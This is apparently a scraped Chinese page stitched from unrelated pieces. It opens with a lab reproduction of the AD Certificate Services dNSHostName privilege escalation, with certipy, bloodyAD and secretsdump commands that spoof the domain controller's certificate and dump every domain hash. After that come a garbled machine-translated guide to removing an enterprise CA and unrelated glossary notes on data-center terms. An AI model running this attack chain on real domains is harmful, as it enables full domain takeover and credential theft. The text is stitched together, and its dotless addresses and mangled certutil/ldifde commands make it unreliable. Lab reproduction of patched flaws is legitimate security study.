Windows域提权漏洞分析与复现

当Windows系统的Active Directory证书服务（CS）在域上运行时，由于机器账号中的dNSHostName属性不具有唯一性，域中普通用户可以将其更改为高权限的域控机器账号属性，然后从Active Directory证书服务中获取域控机器账户的证书，导致域中普通用户权限提升为域管理员权限。这一漏洞最早由安全研究员Oliver Lyak发现并公开分析过程和POC，微软在2022年5月的安全更新中对其进行了修补。

影响范围较广，包括Win81、Win10、Win11、Win Server 2012 R2、Win Server 2016、Win Server 2019、Win Server 2022等版本，详细版本号可以参考微软官方的公告（参考链接）。

操作系统：

Win10、Win Server 2016、Kali-linux-20221。

分析工具：

ADExplorer、Certipy、bloodyAD、impacket、PKINITtools。

关于这个漏洞的分析和复现文章网上已经很多了，但是笔者在分析和复现这个漏洞时遇到的一些“坑”大多并未提及。所以，今天主要分享遇到的问题和解决方法。

首先设置Win Server 2016的IP地址为固定IP，然后设置其DNS服务器地址。测试时域控服务器的计算机名为dc，IP为192168220160，网关为1921682201

接下来是安装域控环境。在Win Server 2016安装域控环境比较简单，安装时，使用超级管理员Administrator登录，然后在服务管理器的仪表盘界面选择添加角色和功能，在弹出的向导中按照默认选项，直接“下一步”即可，注意在服务器角色界面中勾选“Active Directory域服务”即可，如下图所示：

域服务安装完成后，选择“将此服务器提升为域控制器”，如下图所示：

然后选择“添加新林”指定根域名，笔者测试时设置的是：fenghuotailocal，如下图所示：

其他的选项按照默认设置就可以了，另外，安装过程中会自动安装DNS服务器，安装成功后需要重启计算机。

最后是安装域证书服务。还是在服务管理器的仪表盘界面选择添加角色和功能，在弹出的向导中按照默认选项，直接“下一步”即可，注意在服务器角色界面中勾选“Active Directory证书服务”即可，如下图所示：

然后在选择角色服务的步骤中，需要额外再选择“证书颁发机构Web注册”，如下图所示：

域证书服务安装成功后，需要再配置域证书服务，如下图所示：

在配置域证书服务中，需要选择“证书颁发机构”和“证书颁发机构Web注册”，如下图所示：

最后再选择“企业证书”（如果不是域成员，无法选择该选项，但默认账号Administrator可以），如下图所示：

其他选项按照默认设置即可。

域控服务和域证书服务安装成功后，在服务管理器的仪表盘的工具菜单中选择“Active Directory管理中心”，然后在Users分组下新建一个用户账号，输入密码和选择“密码永不过期”，模拟加入域环境的普通用户账号。分析时使用的普通用户账号是testcve，如下图所示：

域普通用户账号建立好后，再选择另外一台计算机，测试时使用的是64位的 Win10系统，计算机名为testmachine，加入刚建立的域fenghuotailocal，然后使用刚建立的域普通用户账号testcve登录（加入域的方法请自行搜索，此步骤无特殊设置）。到此，测试环境就搭建好了。

以域普通用户账号testcve登录Win10计算机后，使用ADExplorer工具分析该提权漏洞产生的原因。

ADExplorer工具需要先登录，分析时使用普通域用户账号testcve登录fenghuotailocal域，如下图所示：

登录成功后，展开左边的树形控件“DC=fenghuotai,DC=local”，然后再展开“CN=Computers”和“CN=Users”，可以分别看到刚才新加入域的名为CN=TESTMACHINE的win10计算机机器账号和普通域用户账号CN=testcve，这两个账号均包含了很多属性值，如下图所示：

每个属性的具体含义可以参考微软官方的帮助文档，此次分析只关注该漏洞相关的属性。默认情况下，域用户账号可以申请User证书，域计算机机器账号可以申请Machine证书，两个证书都允许客户端身份验证。

展开Computers分组，选中刚才加入域的计算机CN=TESTMACHINE，其中一项属性dNSHostName的内容为testmachinefenghuotailocal，testmachine就是新加入域的Win10计算机的计算机名，这个属性是向域证书服务申请机器账号证书时用于标识指定计算机机器账号的，也就是说dNSHostName的内容和机器证书是绑定的，不同机器账号的dNSHostName内容，就会得到不同的证书。另外属性sAMAccountName的内容为TESTMACHINE$，这个属性作为计算机机器账号名，如下图所示：

那么可以将dNSHostName的内容改为域控服务器的内容吗？如果可以的话，岂不是就伪造成域控服务器的机器账号了吗？尝试将其内容改为dcfenghuotailocal，却会得到一个错误，更改失败，如下图所示：

为什么会出现这个错误？因为dNSHostName属性和另外一个servicePrincipalName属性是相关联的，更改dNSHostName属性后，域控服务器将自动更新servicePrincipalName属性的值。这样就导致和原域控服务器机器账号的servicePrincipalName属性冲突了。TESTMACHINE$机器账号属性servicePrincipalName中的内容，如下图所示：

但是如果删除了其servicePrincipalName属性中的两项内容RestrictedKrbHost/testmachinefenghuotailocal和HOST/testmachinefenghuotailocal，更改dNSHostName属性的内容为dcfenghuotailocal，不会导致冲突，更改将会成功。

属性servicePrincipalName中删除了两项后的内容，如下图所示：

但是如果删除了其servicePrincipalName属性中的两项内容RestrictedKrbHost/testmachinefenghuotailocal和HOST/testmachinefenghuotailocal，更改dNSHostName属性的内容为dcfenghuotailocal，不会导致冲突，更改将会成功。

属性servicePrincipalName中删除了两项后的内容，如下图所示：

dNSHostName属性的内容成功更改为域控服务器的内容dcfenghuotailocal，如下图所示：

到此，普通机器账号TESTMACHINE ，然后从Active Directory证书服务中申请到域控机器账户的证书，导致域中普通用户权限提升为域管理员权限。

根据该漏洞的分析结果，想要成功利用该漏洞，需要满足如下几个条件：

1、域控服务器系统版本

Win81、Win10、Win11、Win Server 2012 R2、Win Server 2016、Win Server 2019、Win Server 2022等版本，详细版本号可以参考微软官方的公告（参考链接）。

2、域内普通用户账号权限

需要获取域内至少一个普通用户账号权限，并且需要该账户对dNSHostName等属性具有相应的权限。默认情况，普通用户账号具有该权限。

3、企业证书服务

域内部署有企业证书服务，并允许被控制的计算机账户申请计算机身份验证证书。

环境搭建过程不再赘述，参照分析过程即可，攻击机选择Kali-linux-20221，需要安装额外的工具Certipy、bloodyAD、impacket、PKINITtools

首先需要获取域控服务器，域证书服务器的一些基本信息。在受控的主机上执行powershell命令Get-ChildItem Cert:\LocalMachine\Root\，得到域证书服务器地址fenghuotai-DC-CA，域控服务器地址fenghuotailocal，域控计算机名为dc，如下图所示：

设置攻击机的DNS服务器地址为域控DNS服务器地址，或者在本地hosts文件中设置域控和与证书服务器域名的ip，不然会导致无法解析域名等错误。设置kali的hosts文件内容，如下图所示：

复现环境准备好后，先使用掌握的域内普通用户账号申请证书，并验证登录，测试复现环境是否异常。申请证书命令certipy req 'fenghuotailocal/testcve:1qaz3edc@dcfenghuotailocal' -ca fenghuotai-DC-CA -template User

可能会遇到NETBIOS超时现象，重新执行一次申请证书命令即可。

申请用户账号证书成功后，执行命令certipy auth -pfx testcvepfx验证该证书，获取其NT hash，如下图所示：

成功获取到了NT hash，说明测试环境没问题。如果遇到错误（特别是还原域控虚拟机后），说明域控有些服务没正确启动。需要重启域控服务器，待仪表板上的服务项启动后，或者手动启动后，再重启Kerberos Key Distribution Center（kdc）服务。不知道实战中是否会遇到该错误，如果遇到了，后面的利用就无法进行了。

使用命令python bloodyADpy -d fenghuotailocal -u testcve -p '1qaz3edc' --host 192168220160 addComputer pwnmachine 'CVEPassword1234 '，新建一台名为pwnmachine，密码为CVEPassword1234 的机器账号，如下图所示：

然后使用命令python bloodyADpy -d fenghuotailocal -u testcve -p '1qaz3edc' --host 192168220160 setAttribute 'CN=pwnmachine,CN=Computers,DC=fenghuotai,DC=local' dNSHostName '["dcfenghuotailocal"]'，设置其dNSHostName 属性为域控服务器属性，如下图所示：

设置成功后使用命令certipy req 'fenghuotailocal/pwnmachine 的证书，其实申请到的是域控dc$的证书，如下图所示：

获取到域控的机器账号证书后，使用命令certipy auth -pfx /dcpfx -dc-ip 192168220160进行登录验证，获取其NT hash，如下图所示：

然后使用impacket工具examples目录下的 secretsdumppy 脚本，命令为python3 secretsdumppy 'fenghuotailocal/dc$@dcfenghuotailocal' -hashes :d396bce5a7bf19ed7bfa58b8f923357a，获取域内所有账号hash，如下图所示：

当然，还可以使用PKINITtools工具，获取域控最高权限shell。

本分步指南介绍了如何停止使用 Microsoft Windows 企业 CA，以及如何从 Active Directory 目录服务中删除所有相关的对象。

　　步骤 1： 废除所有活动由企业 CA 签发的证书

　　单击开始，指向管理工具，然后单击证书颁发机构。

　　展开您的 CA，然后单击颁发的证书文件夹。

　　在右窗格中，单击某个已颁发的证书，然后按 CTRL + A 来选择所有已颁发的证书。

　　用鼠标右键单击所选的证书，单击所有任务，然后都单击吊销证书。

　　在证书吊销对话框中，单击以选中作为吊销的原因停止的操作，然后单击确定。

　　步骤 2： 增加 CRL 发布间隔

　　在证书颁发机构 Microsoft 管理控制台 (MMC) 管理单元中，用鼠标右键单击吊销的证书文件夹，然后单击属性。

　　在CRL 发布间隔框中，键入适当的长值，然后单击确定。

　　注意:应保持了已被吊销的证书的生存期超过生存期的证书吊销列表 (CRL)。

　　步骤 3： 将发布新的 CRL

　　在证书颁发机构 MMC 管理单元中，右键单击吊销的证书文件夹。

　　单击所有任务，然后单击发布。

　　在发布 CRL对话框中，单击新的 CRL，然后单击确定。

　　步骤 4： 拒绝任何挂起的请求

　　默认情况下，一个企业 CA 不存储证书的请求。但是，管理员可以更改此默认行为。要拒绝任何挂起的证书请求，请执行以下步骤：

　　在证书颁发机构 MMC 管理单元中，请单击待定的请求文件夹。

　　在右窗格中，单击一个挂起的请求，然后按 CTRL + A 来选择所有挂起的证书。

　　用鼠标右键单击所选的请求，单击所有任务，然后单击拒绝请求。

　　步骤 5： 从服务器上卸载证书服务

　　以停止证书服务，单击开始，单击运行，键入cmd，然后单击确定。

　　在命令提示符下键入certutil-关闭，然后按 enter 键。

　　在命令提示符下键入certutil-键，然后按 enter 键。此命令将显示所有已安装的加密服务提供程序 (CSP) 和与每个提供程序相关联的密钥存储区的名称。在列出的密钥存储区中列出将您的 CA 的名称。该名称将出现几次，如下面的示例中所示：

　　(1)Microsoft Base Cryptographic Provider v10:

　　1a3b2f44-2540-408b-8867-51bd6b6ed413

　　MS IIS DCOM ClientSYSTEMS-1-5-18

　　MS IIS DCOM Server

　　Windows2000 Enterprise Root CA

　　MS IIS DCOM ClientAdministratorS-1-5-21-436374069-839522115-1060284298-500

　　afd1bc0a-a93c-4a31-8056-c0b9ca632896

　　Microsoft Internet Information Server

　　NetMon

　　MS IIS DCOM ClientAdministratorS-1-5-21-842925246-1715567821-839522115-500

　　(5)Microsoft Enhanced Cryptographic Provider v10:

　　1a3b2f44-2540-408b-8867-51bd6b6ed413

　　MS IIS DCOM ClientSYSTEMS-1-5-18

　　MS IIS DCOM Server

　　Windows2000 Enterprise Root CA

　　MS IIS DCOM ClientAdministratorS-1-5-21-436374069-839522115-1060284298-500

　　afd1bc0a-a93c-4a31-8056-c0b9ca632896

　　Microsoft Internet Information Server

　　NetMon

　　MS IIS DCOM ClientAdministratorS-1-5-21-842925246-1715567821-839522115-500

　　删除与 CA 相关联的私钥。为此，请在命令提示符处，键入下面的命令，然后按 enter 键：

　　certutil- CertificateAuthorityName delkey

　　注意:如果您的 CA 名称包含空格，请将名称括在引号内。

　　在此示例中，证书颁发机构名为"windows 2000 企业根 CA"。因此，在本示例中的命令行如下所示：

　　certutil-delkey"windows 2000 企业根 CA"

　　列出密钥存储区中，再次以验证您的 CA 的私钥已被删除。

　　为您的 CA 中删除私钥后，卸载证书服务。若要执行此操作，请按照下列步骤操作，具体取决于您所运行的 Windows 服务器的版本。

　　Windows Server 2003

　　如果它仍处于打开状态，请关闭证书颁发机构 MMC 管理单元中。

　　单击开始，指向控制面板，然后单击添加或删除程序。

　　单击添加/删除 Windows 组件。

　　在组件框中，单击以清除证书服务复选框，单击下一步，然后按照 Windows 组件向导中的说明完成删除证书服务。

　　Windows Server 2008 和更高版本

　　如果您要卸载一个企业 CA，企业管理员或同等身份的成员身份是完成此过程所需的最小值。有关详细信息，请参见实现基于角色的管理

　　要卸载 CA，请执行以下步骤：

　　单击开始，指向管理工具，然后单击服务器管理器。

　　在角色摘要，单击以启动删除角色向导中，删除角色，然后单击下一步。

　　单击以清除Active Directory 证书服务复选框，然后单击下一步。

　　在确认删除选项页上，查看信息，然后单击删除。

　　如果运行 Internet Information Services (IIS)，并且提示您继续卸载过程之前，请停止该服务，请单击确定。

　　删除角色向导完成后，重新启动服务器。

　　过程会稍有不同，如果您有多个 Active Directory 证书服务 (AD CS) 角色服务安装在一台服务器上。

　　注意您必须使用与安装 CA 后，才能完成此过程的用户相同的权限登录。如果您要卸载一个企业 CA，企业管理员或同等身份的成员身份是完成此过程所需的最小值。有关详细信息，请参阅 实现基于角色的管理

　　单击开始，指向管理工具，然后单击服务器管理器。

　　在角色摘要，单击Active Directory 证书服务。

　　在角色服务中，单击删除角色服务。

　　单击以清除证书颁发机构复选框，然后单击下一步。

　　在确认删除选项页上，查看信息，然后单击删除。

　　如果 IIS 正在运行，并提示您继续卸载过程之前，请停止该服务，请单击确定。

　　删除角色向导完成后，您必须重新启动服务器。这将完成卸载过程。

　　如果剩余的角色服务如联机响应程序服务中，被配置为要使用的数据来自卸载 CA，则必须重新配置这些服务，以支持一个不同的 CA。卸载 CA 之后，下列信息保留在服务器中：

　　CA 数据库

　　CA 公钥和私钥的密钥

　　个人存储区中 CA 的证书

　　如果在安装 AD CS 过程中指定的共享的文件夹的共享文件夹中的 CA 的证书

　　受信任的根证书颁发机构存储区中 CA 链的根证书

　　中级证书颁发机构存储区中 CA 链的中级证书

　　CA 的 CRL

　　默认情况下，此信息将保存在服务器中，在您卸载和重新安装 CA 的情况下。例如，您可能会卸载并重新安装 CA，如果您想要将独立 CA 更改为企业 CA。

　　第 6 步： 从 Active Directory 删除 CA 对象

　　是某个域的成员服务器上安装 Microsoft 证书服务后，在 Active Directory 中的配置容器中创建多个对象。

　　这些对象，如下所示：

　　certificateAuthority 对象

　　位于 CN = AIA，CN = 公共服务，CN = 服务、 CN = 配置中，DC =ForestRootDomain。

　　包含此 CA 的 CA 证书。

　　发布颁发机构信息访问 (AIA) 的位置。

　　crlDistributionPoint 对象

　　位于 CN =服务器名，CN = CDP，CN = 公共服务，CN = 服务、 CN = 配置中，DC =ForestRoot，DC = com。

　　包含定期由 CA 发布的 CRL。

　　已发布的 CRL 分发点 (CDP) 位置

　　certificationAuthority 对象

　　位于 CN 证书颁发机构，CN = = 公钥服务，CN = 服务、 CN = 配置中，DC =ForestRoot，DC = com。

　　包含此 CA 的 CA 证书。

　　pKIEnrollmentService 对象

　　位于 CN = 注册服务，CN = 公共服务，CN = 服务、 CN = 配置中，DC =ForestRoot，DC = com。

　　由企业 CA。

　　包含有关类型的已配置 CA 的证书信息的问题。在此对象上的权限，可以控制哪些安全主体可以针对此 CA 注册。

　　卸载 CA 时，只有 pKIEnrollmentService 对象被删除。这样可以防止客户端试图对已停止使用的 CA 注册。其他对象将保留，因为由 CA 签发的证书可能是仍未完成。必须按照中的过程吊销这些证书"步骤 1： 所有活动由企业 CA 签发的证书吊销"一节。

　　为了成功地处理这些未完成的证书的公钥基础结构 (PKI) 客户机，计算机必须找到在 Active Directory 中的颁发机构信息访问 (AIA) 和 CRL 分发点的路径。它是一个好主意，要取消所有未完成的证书、 延长寿命的 crl，和在 Active Directory 中发布 CRL。如果由不同的 PKI 客户端处理未完成的证书，验证将会失败，并且将不会使用这些证书。

　　如果不是为了维护 CRL 分发点和 AIA 在 Active Directory 中的优先级，则可以删除这些对象。如果您希望处理一个或多个以前活动的数字证书，则不要删除这些对象。

　　从活动目录中删除证书服务的所有对象

　　注意:不应删除证书模板从 Active Directory 直到您删除在 Active Directory 目录林中的所有 CA 对象之后。

　　若要从 Active Directory 删除证书服务的所有对象，请执行以下步骤：

　　确定 CA 的 CACommonName。若要执行此操作，请按照下列步骤操作：

　　单击开始，单击运行，在打开框中，键入cmd ，然后单击确定。

　　键入certutil，，然后按 enter 键。

　　记下属于您的 CA 的名称值。为在此过程中后面的步骤，您将需要 CACommonName。

　　单击开始，指向管理工具，然后单击Active Directory 站点和服务。

　　在视图菜单上，单击显示服务节点。

　　展开服务，展开公钥服务，然后单击AIA文件夹。

　　在右窗格中，右键单击您的 CA CertificationAuthority对象，单击删除，然后单击是。

　　在 Active Directory 站点和服务 mmc 管理单元的左窗格中，单击CDP文件夹。

　　在右窗格中，找到的服务器安装了证书服务的容器对象。用鼠标右键单击该容器，单击删除，然后单击是两次。

　　在 Active Directory 站点和服务 mmc 管理单元的左窗格中，单击证书颁发机构节点。

　　在右窗格中，右键单击您的 CA CertificationAuthority对象，单击删除，然后单击是。

　　在 Active Directory 站点和服务 mmc 管理单元的左窗格中，单击注册服务节点。

　　在右窗格中，验证已卸载证书服务时，已删除您的 CA 的 pKIEnrollmentService 对象。如果不删除该对象，用鼠标右键单击该对象，单击删除，然后单击是。

　　如果您找不到的所有对象，某些对象可能处于 Active Directory 后执行这些步骤。清理后可能留下的对象在 Active Directory 中的 CA，请按照下列步骤，以确定是否仍然存在任何 AD 对象：

　　在命令行中，键入以下命令，然后按 enter 键：

　　ldifde-r"cn =CACommonName"-d"CN = 公钥服务，CN = 服务、 CN = 配置中，DC =ForestRoot，DC = com"-f outputldf

　　在此命令中， CACommonName表示您在步骤 1 中确定的名称值。例如，如果名称值为"CA1 Contoso"，键入以下命令：

　　ldifde-r"cn = CA1 Contoso"-d"cn = 公共服务，cn = 服务、 cn = 配置中，dc = contoso，dc = com"-f remainingCAobjectsldf

　　在记事本中打开 remainingCAobjectsldf 文件。替换词"误差： 添加"与"误差： 删除。"然后，验证将删除 Active Directory 对象是否是合法的。

　　在命令提示符处，键入下面的命令，，然后按 enter 键以从 Active Directory 中删除剩余的 CA 对象：

　　ldifde-i-f remainingCAobjectsldf

　　如果您确信所有的证书颁发机构已被删除，请删除证书模板。重复步骤 12，以确定是否仍然存在任何 AD 对象。

　　重要：您必须删除证书模板，除非已被删除的所有证书颁发机构。如果意外地删除模板，请执行以下步骤：

　　请确保您登录到作为企业管理员运行证书服务的服务器。

　　在命令提示符处，键入下面的命令，，然后按 enter 键：

　　cd %windir%\system32

　　键入以下命令，并按 enter 键：

　　regsvr32 /i:i /n /s 颁发

　　此操作将重新创建在 Active Directory 中的证书模板。

　　若要删除证书模板，请按照下列步骤。

　　在左窗格中的"Active Directory 站点和服务"mmc 管理单元，单击证书模板文件夹。

　　在右窗格中，单击证书模板，然后按 CTRL + A 来选择所有模板。用鼠标右键单击选定的模板，单击删除，然后单击是。

　　步骤 7： 删除证书发布到 NtAuthCertificates 对象

　　删除 CA 对象后，您必须删除 CA 证书发布到NtAuthCertificates对象。使用下列命令之一来删除 NTAuthCertificates 存储区中的证书：

　　certutil-viewdelstore ' 'ldap： / / CN = NtAuthCertificates，CN = 公共密钥

　　服务，，DC = ForestRoot，DC = com 吗？ cACertificate 基？ 对象类 = certificationAuthority"

　　certutil-viewdelstore ' 'ldap： / / CN = NtAuthCertificates，CN = 公共密钥

　　服务，，DC = ForestRoot，DC = com 吗？ cACertificate 基？ 对象类 = pKIEnrollmentService"

　　注意:必须具有企业管理员权限才能执行此任务。

　　-Viewdelstore操作调用证书选择 UI 的证书中指定的属性集。您可以查看证书的详细信息。您可以从选择对话框，不更改取消操作。如果您选择一个证书，该证书被删除时用户界面关闭并充分执行了该命令。

　　使用下面的命令来查看在活动目录中的NtAuthCertificates对象的完整 LDAP 路径：

　　certutil 商店- |findstr"CN = NTAuth"

　　步骤 8： 删除 CA 数据库

　　当卸载证书服务时，CA 数据库将保持不变，以使该 CA 可以是在另一台服务器上重新创建。

　　若要删除 CA 数据库，请删除 %systemroot%\System32\Certlog 文件夹。

　　步骤 9： 清理的域控制器

　　卸载 CA 后，必须删除已颁发给域控制器证书。

　　若要删除到 Windows Server 2000 的域控制器颁发的证书，请使用 Microsoft Windows 2000 资源工具包中的 Dsstoreexe 实用程序。

　　若要删除证书已颁发给 Windows Server 2000 域控制器，请执行以下步骤：

　　单击开始，然后单击运行，类型 cmd然后按 enter 键。

　　在域控制器上，键入 dsstore dcmon 在命令提示符处，然后按 ENTER。

　　键入 3然后按 enter 键。此操作将删除所有的域控制器上的所有证书。

　　注意Dsstoreexe 实用程序将尝试验证颁发给每个域控制器的域控制器证书。从他们各自的域控制器中删除未通过验证的证书。

　　若要删除到 Windows Server 2003 的域控制器颁发的证书，请执行以下步骤。

　　重要：如果您使用的基于版本 1 个域控制器模板的证书，则不要使用此过程。

　　单击开始，然后单击运行，类型 cmd然后按 enter 键。

　　在域控制器上的命令提示符下键入 certutil-dcinfo deleteBad

　　Certutilexe 试图验证所有 DC 证书向域控制器发出的。已删除未通过验证的证书。

　　若要强制应用程序的安全策略，请执行以下步骤：

　　单击开始，然后单击运行，类型 cmd 在打开框中，并按 ENTER。

　　在命令提示符下，键入相应版本的操作系统的相应命令，然后按 ENTER：

活动目录是从一个数据存储开始的。它采用的是Exchange Server的数据存储，称为：Extens ible Storage Service （ESS）。其特点是不需要事先定义数据库的参数，可以做到动态地增长，性能非常优良。这个数据存储之上已建立索引的，可以方便快速地搜索和定位。活动目录的分区是"域（Domain）"，一个域可以存储上百万的对象。域之间还有层次关系，可以建立域树和域森林，无限地扩展。

　　在数据存储之上，微软建立了一个对象模型，以构成活动目录。这一对象模型对LDAP有纯粹的支持，还可以管理和修改Schema。Schema包括了在活动目录中的计算机、用户和打印机等所有对象的定义，其本身也是活动目录的内容之一，在整个域森林中是唯一的。通过修改Schema的工具，用户或开发人员可以自己定义特殊的类和属性，来创建所需要的对象和对象属性。

　　活动目录包括两个方面：一个目录和与目录相关的服务。目录是存储各种对象的一个物理上的容器；而目录服务是使目录中所有信息和资源发挥作用的服务。活动目录是一个分布式的目录服务。信息可以分散在多台不同的计算机上，保证快速访问和容错；同时不管用户从何处访问或信息处在何处，都对用户提供统一的视图。

DC：(Data Center)数据中心， 是一个物理上的概念 ，指一个物理空间（比如机房）里服务器、网络、存储等设备的集合，实现信息的集中处理、存储、传输、交换和管理。

POD：（Point of Delivery）分发点，为了便于资源的池化，将一个物理上的DC划分成一个或多个物理分区，每个物理分区称为一个POD，所以 POD也是一个物理上的概念 。POD是DC的基本部署单元，一台物理设备只能属于一个POD。

AZ：（Available Zone）可用域，是一个 逻辑上的概念 ， 故障的隔离域 。一个AZ可能包含多个DC，一个DC也可以设置多个AZ。

Tenant：租户，由系统管理员创建和分配，租户是一个VDC（虚拟DC，一个组织可使用的资源的集合，资源包括：计算、存储、网络资源）的实际拥有者和管理者，不同的VDC对应不同的租户。

VPC：（virtual private cloud）虚拟私有云，基于物理网络抽象出来的逻辑的网元，并根据业务编排逻辑网元，从而形成一个虚拟的网络， 不同的VPC逻辑上隔离，但共享物理网络，从而实现物理网络资源池化后的共享问题 。

DC是Domain Controller的缩写，即域控制器， AD是active directory的缩写，即活动目录。

Domain Controller是一台计算机，实现用户，计算机，目录的统一管理。

AD（活动目录）是一种存储协议，基于LDAP。

两者完全是两种概念，DC也可以不基于AD实现，DC域是组织与存储资源的核心管理单元

添加角色和功能向导

勾选上“Active Directory域服务”，同时也在该服务器上安装域服务管理工具。